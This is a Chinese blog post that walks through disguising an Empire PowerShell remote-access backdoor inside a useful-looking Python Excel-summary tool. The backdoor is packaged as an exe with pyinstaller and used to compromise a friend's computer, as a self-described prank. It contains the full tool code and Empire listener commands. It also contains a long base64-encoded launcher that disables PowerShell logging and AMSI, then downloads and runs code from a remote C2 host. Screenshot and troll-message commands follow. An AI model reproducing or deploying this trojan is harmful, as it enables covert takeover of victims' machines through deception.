远控盆友电脑

写个服务器搭建也要被封，都不知道错在哪里了，无力吐槽。
仅作技术交流，请勿用于非法用途。

---

0x00鱼的喜好

盆友叫帮忙写个程序。需求这样的，自动打开每一张表excel，把表中(包含子表)同类别后的内容统计到一张表上。

需求表.png

0x01准备鱼饵

社工才是木马的关键，如何使别人想要运行你的程序才是走向成功的第一步。对准盆友的喜好设计的程序，可以解决他工作的问题，运行程序当然是不用操心的。
如何去实现程序的功能不是本篇的重点，这里直接附上代码了，看不懂可以直接看注释，注释已经写的很细了。

#! /usr/bin/python3
# -*- coding:utf - 8 -*-
# autho:czy
# 用于表格汇总，老仁总专用
#导入模块
import xlrd
import xlsxwriter
import os
import subprocess

#打开一个excel文件
def open_xls(file):
    fh=xlrd.open_workbook(file)
    return fh

#获取sheet表的个数
def getshnum(fh):
    x=0
    #为sheet的数量
    sh=getsheet(fh)
    for sheet in sh:
        x+=1
    return x

#获取excel中所有的sheet表
def getsheet(fh):
    return fh.sheets()

#读取文件内容并返回行内容
def getFilect(file,shnum):
    
    fh=open_xls(file)
    table=fh.sheets()[shnum]
    # 行数 
    row_count = table.nrows
    # 获取每行的数据    
    for element in range(row_count):
        #第一列单元格为table_name1以此类推
        table_name_1 = table.row_values(element)[0]
        table_name_2 = table.row_values(element)[1]
        #过滤第三列单元格的空格和换行符
        table_value_temp = str(table.row_values(element)[2]).replace(" ","")
        table_value = table_value_temp.replace("\n","")
        #判断第一二列内容是否存在用于保存数据的字典key中
        #如果存在将第三列数据保存入字典
        if table_name_2 in table_data.keys():
            table_data.get(table_name_2).append(table_value)
        elif table_name_1 in table_data.keys():
            table_data.get(table_name_1).append(table_value)

#存储最后的数据
def savefile(table_data):
    #保存最后结果文件
    endfile='E:\\Code\\php\\python\\excel-test\\test.xlsx'
    #打开文件夹新建子表为"啦啦啦"
    workbook = xlsxwriter.Workbook(endfile)
    worksheet = workbook.add_worksheet('啦啦啦')
    #表盒第一行内容
    headings = ['类别','内容']
    #接收之前的字典
    data = table_data
    #从A1开始以行的形式写入headings的诗句
    #A2用于保存从A2开始列写入的数据，注意只能以列表的方式，每个元素一个单元格
    #B2用于保存从B2开始列写入的数据，注意只能以列表的方式，每个元素一个单元格
    worksheet.write_row('A1',headings)
    A2 = []
    B2 = []

    #从字典中获取键的值
    for data_key in data.keys():
        #将所有键存入A2的空列表
        A2.append(data_key)
        #B为空字符串
        B = ""
        #以列表的形式遍历字典的值
        for i in range(len(data[data_key])):
            #将字典值中得列表依次转化为字符串连接到B
            B += str(data[data_key][i])
        #将已转化为字符串字典的值添加到B2列表
        B2.append(B)

    #A2用于保存从A2开始列写入的数据，
    #B2用于保存从B2开始列写入的数据
    worksheet.write_column('A2',A2)
    worksheet.write_column('B2',B2)
    #关闭表格
    workbook.close()

if __name__=='__main__':
    #定义文件夹的路径
    dir_path = 'E:/Code/php/python/excel/'
    #定义用于存储的字典
    table_data = {"运营协作":[],"食品安全":[],"运营安全":[],"保安服务":[],"宿舍管理":[],"团队管理":[],"仓库管理":[],"店内常规工作":[],"驻店工程/信息部工作":[]}
    
    #获取文件夹中文件的绝对路径
    for fl in os.listdir(dir_path):
        files_path = str(dir_path + fl)

        #fh为excel表打开后返回的数据
        fh=open_xls(files_path)
        #x为表中sheet的数量
        x=getshnum(fh)
        #x为sheet的数量
        for shnum in range(x):
            print("正在读取文件："+str(fl)+"的第"+str(shnum)+"个sheet表的内容...")
            #rvalue=getFilect将文件添加入字典
            getFilect(files_path,shnum)

    for data_key in table_data.keys():
        #维持原来的顺序对字典过滤重复的值
        table_data[data_key] = sorted(set(table_data[data_key]),key=table_data[data_key].index)
        #过滤字典中的1、（1）等符号
        for z in range(len(table_data[data_key])):
            for i in range(1,11):
                x = str(i)+"、"
                y = "(" + str(i) +")"
                table_data[data_key][z] = table_data[data_key][z].replace(x,"")
                table_data[data_key][z] = table_data[data_key][z].replace(y,"")
            
    savefile(table_data)

由于表中涉及盆友公司的信息，这里测试过程就不写了。

0x02混入香料

使用渗透神器EMPIRE来实现我们使用powershell远控。

empire.png

配置监听地址
朋友和我不在一个公司，肯定是不能使用局域网远控的，这里就需要一个端口映射服务器了，这里我用的是花生壳，现在已经实名认证了，大家不要学了去干坏事哦。

内网穿透配置.png

在empire框架中输入如下命令进行监听端口的配置。

#进入监听
(Empire) > listeners
#使用http监听模式
(Empire: listeners) > uselistener http
#配置内网映射地址喝端口
(Empire: listeners/http) > set Host http://映射地址：端口
#配置本地IP地址
(Empire: listeners/http) >set BindIP 本地IP
＃配置本地端口８０
(Empire: listeners/http) >set Port 本地端口80
＃配置监听名字
(Empire: listeners/http) >set Name test_1
＃启用
(Empire: listeners/http) >execute

监听启动后，会有如下提示。1listeners currently active，一个监听已经激活

监听激活.png

输入如下命令获取powershell远控命令。

#进入监听
(Empire) > listeners
#获取powershell代码
(Empire: listeners) > launcher powershell test_1

powershell.png

0x03装饵

在刚才的程序代码中加入一个函数来运行代码咯。

def joke():
    code = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQBUAFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAGEAbABVAGUAKAAkAG4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8ATABMAGUAYwBUAGkAbwBuAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAdABJAG8ATgBhAFIAWQBbAFMAdABSAGkAbgBHACwAUwBZAHMAdABlAE0ALgBPAGIAagBlAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUATABTAEUAewBbAFMAQwBSAEkAUABUAEIAbABvAGMAawBdAC4AIgBHAGUAdABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBFACgAJABuAHUATABMACwAKABOAEUAVwAtAE8AQgBqAEUAQwB0ACAAQwBPAEwAbABFAEMAdABpAE8AbgBzAC4ARwBFAE4ARQBSAEkAQwAuAEgAYQBTAGgAUwBFAHQAWwBTAFQAUgBpAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAGEAbAB1AGUAKAAkAG4AdQBMAEwALAAkAHQAcgB1AGUAKQB9ADsAfQA7AFsAUwBZAHMAVABlAE0ALgBOAGUAdAAuAFMAZQByAFYASQBjAGUAUABvAGkAbgBUAE0AYQBOAEEAZwBFAHIAXQA6ADoARQB4AHAARQBDAHQAMQAwADAAQwBPAG4AVABJAG4AVQBlAD0AMAA7ACQAdwBDAD0ATgBFAHcALQBPAGIASgBFAGMAdAAgAFMAeQBTAFQAZQBtAC4ATgBlAHQALgBXAEUAQgBDAGwAaQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBhAEQAZQBSAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBvAHgAWQA9AFsAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcAZQBiAFIAZQBxAFUARQBTAHQAXQA6ADoARABlAGYAYQBVAGwAdABXAGUAYgBQAFIATwBYAFkAOwAkAFcAQwAuAFAAUgBvAHgAWQAuAEMAUgBFAEQARQBuAFQAaQBBAEwAUwAgAD0AIABbAFMAeQBzAHQARQBNAC4ATgBlAFQALgBDAHIAZQBEAEUAbgBUAEkAYQBMAEMAYQBjAEgAZQBdADoAOgBEAGUARgBhAFUATAB0AE4AZQB0AHcAbwBSAGsAQwBSAEUARABlAG4AVABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABlAG0ALgBUAEUAWAB0AC4ARQBOAEMATwBkAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AEUAcwAoACcAOQAxADAAMgBlADgAMwBiAGQANQBlAGYAMwBiAGIANAA3AGMAMwAzADMAZgA1AGQAYwBkADkAMgBiADYAMQAyACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA4ADkANgB0ADEAdAAxADgAMwAuAGkAbwBrAC4AbABhADoAMQAzADIANgA2ACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAB3AEMALgBIAEUAQQBkAEUAcgBTAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBXAG4ARQA4AGQATQBhAHUAOABBAG0AMgAxAEQAawB0AFMAYgB5AG4AQwBQAHYAVwB3AEQARQA9ACIAKQA7ACQARABBAFQAYQA9ACQAVwBDAC4ARABvAHcAbgBsAE8AQQBEAEQAQQB0AGEAKAAkAHMARQByACsAJAB0ACkAOwAkAGkAVgA9ACQAZABhAFQAQQBbADAALgAuADMAXQA7ACQAZABhAHQAQQA9ACQARABBAHQAQQBbADQALgAuACQARABhAFQAYQAuAEwARQBuAEcAdABIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
    p = subprocess.Popen(code,shell = 'True',stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    p.wait()

安装pyinstaller用于将Python代码封装为exe执行文件

#安装下pyinstaller
pip install pyinstaller
#进入到程序存放的路径，执行下面命令
# -F 为单个文件 -w是windows运行 -i是指定图标 test.py是之前写好的程序
pyinstaller -F -w -i heihei.ico hello.py

运行后它就会创建一个dist的文件夹，文件就在里面（送个小恶魔图标会不会提高了警惕性，哈哈哈）

木马.png

0x04抛竿

大兄弟来接住这个毒饲料。

投放毒饲料.png

0x05咬钩提竿

出现agent说明对方已经回弹自己的shell了。（名称为P3GTUSB7）

远程连接.png

代理已经成功上线

agents信息.png

输入以下命令进入shell

interact P3GTUSB7

输入sc进行桌面截图看看桌面什么样子

截图.png

win7的系统好Low

桌面.png

使用usemodule trollsploit/message模块发个消息给他看看

小窗口.png

玩笑告于段落了，我要去好好看书了，看到这篇博客的小朋友不要乱运行程序哦。

很好用.png